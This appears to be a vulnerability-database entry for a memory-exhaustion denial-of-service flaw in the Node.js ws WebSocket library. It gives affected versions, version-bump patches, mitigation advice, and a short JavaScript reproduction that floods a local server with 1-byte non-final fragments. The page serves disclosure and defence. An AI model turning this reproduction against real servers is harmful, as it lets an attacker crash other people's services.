ws: Memory exhaustion DoS from tiny fragments and data chunks
Description
The ws WebSocket library is vulnerable to OOM due to excessive memory allocation when processing many small fragments, enabling remote denial of service.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
The ws WebSocket library is vulnerable to OOM due to excessive memory allocation when processing many small fragments, enabling remote denial of service.
Vulnerability
The ws WebSocket library is vulnerable to a memory exhaustion issue that allows a remote attacker to cause a denial of service (OOM) by sending a high volume of exceptionally small WebSocket fragments. The flaw resides in the fragment handling logic, where each small fragment forces allocation of internal structural wrappers that consume significantly more memory than the documented message-size limit. Versions before 5.2.5, 6.2.4, 7.5.11, and 8.21.0 are affected.
Exploitation
An attacker with the ability to establish a WebSocket connection can send a continuous stream of tiny fragments (each as small as 1 byte) with the fin flag set to false. The peer will allocate per-fragment metadata structures, eventually exhausting available memory. The proof-of-concept demonstrates a loop that sends single-byte fragments as fast as the network allows.
Impact
Successful exploitation results in the remote process running out of memory and terminating due to an OOM condition. The attacker achieves a denial of service without requiring authentication or any special privileges beyond a WebSocket connection.
Mitigation
The vulnerability is fixed in ws@8.21.0 and backported to ws@7.5.11, ws@6.2.4, and ws@5.2.5 [1][2][3][4]. As a workaround, users can reduce the maxPayload option to limit the worst-case memory consumption.
AI Insight generated on Jun 15, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: >= 8.0.0, < 8.21.0
Patches
41 file changed · +1 −1
package.json+1 −1 modified@@ -1,6 +1,6 @@ { "name": "ws", - "version": "8.20.1", + "version": "8.21.0", "description": "Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js", "keywords": [ "HyBi",
1 file changed · +1 −1
package.json+1 −1 modified@@ -1,6 +1,6 @@ { "name": "ws", - "version": "7.5.10", + "version": "7.5.11", "description": "Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js", "keywords": [ "HyBi",
1 file changed · +1 −1
package.json+1 −1 modified@@ -1,6 +1,6 @@ { "name": "ws", - "version": "6.2.3", + "version": "6.2.4", "description": "Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js", "keywords": [ "HyBi",
1 file changed · +1 −1
package.json+1 −1 modified@@ -1,6 +1,6 @@ { "name": "ws", - "version": "5.2.4", + "version": "5.2.5", "description": "Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js", "keywords": [ "HyBi",
Vulnerability mechanics
Root cause
"The reassembly logic allocates a per-fragment structural wrapper without limiting the total number of pending fragments, allowing an attacker to exhaust memory by sending many tiny non-final frames."
Attack vector
A remote attacker opens a WebSocket connection and repeatedly sends 1-byte frames with the FIN flag set to false (indicating a continuation frame will follow). The server allocates internal structural wrappers for each frame, and because each frame is tiny, the attacker can send a huge number of them with modest bandwidth [ref_id=1][ref_id=2]. The attacker does not need any authentication; only the ability to establish a single WebSocket connection is required. The cumulative memory consumption of the wrappers exceeds the application's process memory, causing an out-of-memory crash.
Affected code
The vulnerability affects the ws WebSocket library for Node.js across versions 8.20.1 and earlier, 7.5.10 and earlier, 6.2.3 and earlier, and 5.2.4 and earlier. The bundled patches only bump the version number in `package.json` and do not expose the code-level diff that introduces the fix. Based on the advisory text, the defect lies in the fragment-reassembly logic, where structural wrappers are allocated for each incoming fragment without accounting for the cumulative memory overhead of many tiny fragments.
What the fix does
The bundled patches only increment the version number in `package.json`, so the code-level fix is not visible in the provided diffs. According to the advisory, the fix was applied in commits on the `ws` repository and backported to older release lines [ref_id=1][ref_id=2]. The advisory recommends that users who cannot upgrade mitigate the issue by lowering the `maxPayload` option.
Preconditions
- networkAttacker must be able to open a WebSocket connection to the target
- authNo authentication or prior trust is required
- configThe target must be running a vulnerable version of the ws library
Reproduction
```js import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () { const data = Buffer.alloc(1); const options = { fin: false }; const { port } = wss.address(); const ws = new WebSocket(`ws://localhost:${port}`);
ws.on('open', function () { (function send() { ws.send(data, options, function (err) { if (err) return; send(); }); })(); });
ws.on('error', console.error); ws.on('close', function (code, reason) { console.log(`client close - code: ${code} reason: ${reason.toString()}`); }); });
wss.on('connection', function (ws) { ws.on('error', console.error); ws.on('close', function (code, reason) { console.log(`server close - code: ${code} reason: ${reason.toString()}`); }); }); ```
Generated on Jun 15, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6- github.com/advisories/GHSA-96hv-2xvq-fx4pghsaADVISORY
- github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7ghsa
- github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53ghsa
- github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94ghsa
- github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8ghsa
- github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4pghsa
News mentions
0No linked articles in our index yet.